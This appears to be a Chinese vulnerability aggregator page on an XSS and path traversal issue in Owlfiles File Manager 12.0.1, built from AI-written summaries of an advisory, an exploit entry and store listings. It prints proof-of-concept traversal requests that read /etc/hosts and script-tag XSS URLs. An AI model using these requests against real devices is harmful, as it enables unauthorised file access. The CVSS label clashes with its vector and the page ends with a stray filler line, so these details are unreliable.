# Owlfiles 12.0.1 跨站脚本漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: Skyjos -- 🔗来源链接
标签:product
神龙速读:
从这个网页的截图中,我们无法直接获取明显的漏洞信息。不过,我们可以分析一下可能存在的潜在漏洞:
- **应用程序描述**:UltraNotes、Owlfiles、Photo Manager Pro 和 FE File Explorer Pro的功能描述可能暗示着可利用的漏洞,例如Owlfiles和FE File Explorer Pro可能涉及到文件操作,可能存在的漏洞包括目录遍历、文件上传等。
- **缺少安全声明**:通常在描述应用程序功能时,应该包含一些说明,指出应用程序是安全的,或经过了安全测试。例如,“我们的应用程序已经经过严格的安全测试,确保您的数据安全”
然而,更重要的是要指出,**这个截图实际上并未直接显示出任何漏洞**,提供的信息只能辅助进行进一步的探测和分析。如果您持有这个网站的授权进行测试,可以进一步使用相关的网络安全工具和技能进行漏洞发掘。
标题: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities - iOS webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:
### 关键漏洞信息
- **漏洞标题**: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
- **EDB-ID**: 51036
- **CVE**: N/A
- **作者**: CHOKRI HAMMEDI
- **类型**: WEBAPPS
- **平台**: iOS
- **发布日期**: 2023-03-23
- **易受攻击的应用**: Owlfiles File Manager 12.0.1
### 漏洞详情
#### 1. Path Traversal on HTTP built-in server
- **描述**: 在HTTP内置服务器上存在目录遍历漏洞。
- **例子**:
```
GET /../../../../../etc/hosts HTTP/1.1
Host: localhost:8080
××××
HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT
××××
Content of /etc/hosts file
```
#### 2. LFI on HTTP built-in server
- **描述**: 在HTTP内置服务器上存在本地文件包含(LFI)漏洞。
- **例子**:
```
GET /../../../../../../../../etc/hosts HTTP/1.1
Host: localhost:8080
××××
HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 03:28:14 GMT
××××
Content of /etc/hosts file
```
#### 3. Path Traversal on FTP built-in server
- **描述**: 在FTP内置服务器上存在目录遍历漏洞。
- **例子**:
```
ftp> cd /../../../../../../../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../../../../../../..
...
```
#### 4. XSS on HTTP built-in server
- **描述**: 在HTTP内置服务器上存在跨站脚本(XSS)漏洞。
- **例子**:
- `http://localhost:8080/download?path=<script>alert(1)</script>`
- `http://localhost:8080/list?path=<script>alert(1)</script>`
标题: Owlfiles - File Manager App - App Store -- 🔗来源链接
标签:product
神龙速读:
- **App Name:** Owlfiles - File Manager
- **Key Features:**
- Access SMB, WebDAV, FTP, and S3
- Manage files
- Connect servers, NAS and cloud storages
- Transfer files from anywhere to anywhere
- Sync files with computer, NAS
- **Ratings & Reviews:**
- Rating: 4.6 out of 5
- Reviews: 7K Ratings
- User Comments:
- Good experience, easy to use
- Excellent for Synology NAS
- **App Privacy:**
- Data Linked to You: Identifiers
- **Information:**
- Seller: Skyjos Co., Ltd.
- Size: 178.8 MB
- Category: Utilities
- Age Rating: 4+
- **Supports:**
- Family Sharing: In-app purchases and subscriptions may be shareable
- **Key Concerns:**
- The app handles data linked to your identity.
- Privacy practices may vary based on features and age.
- **Additional Insights:**
- Multiple apps by the same developer, indicating a focus on file management and transfer.
- Compatibility with various cloud services and storages may introduce additional vulnerabilities if not properly secured.
标题: Owlfiles File Manager 12.0.1 Cross-Site Scripting via HTTP Server | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
### 关键漏洞信息
- **漏洞名称**: Owlfiles File Manager 12.0.1 Cross-Site Scripting via HTTP Server
- **严重程度**: Medium
- **日期发布**: January 13, 2026
- **受影响设备**: Owlfiles File Manager 12.0.1
- **CVE ID**: CVE-2022-50891
- **CVSS v3.1 Score**: 4.0(AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)
- **CWE**: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- **参考资料**:
- ExploitDB-51036
- Vendor Homepage
- Official App Store Listing
- **发现者**: Chokri Hameddi
- **漏洞描述**: Owlfiles File Manager 12.0.1存在一个跨站脚本漏洞,允许攻击者通过HTTP服务器端点的路径参数注入恶意脚本。攻击者可以设计URL,通过在下载和列出端点中嵌入脚本标签在用户的浏览器中执行任意JavaScript。
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.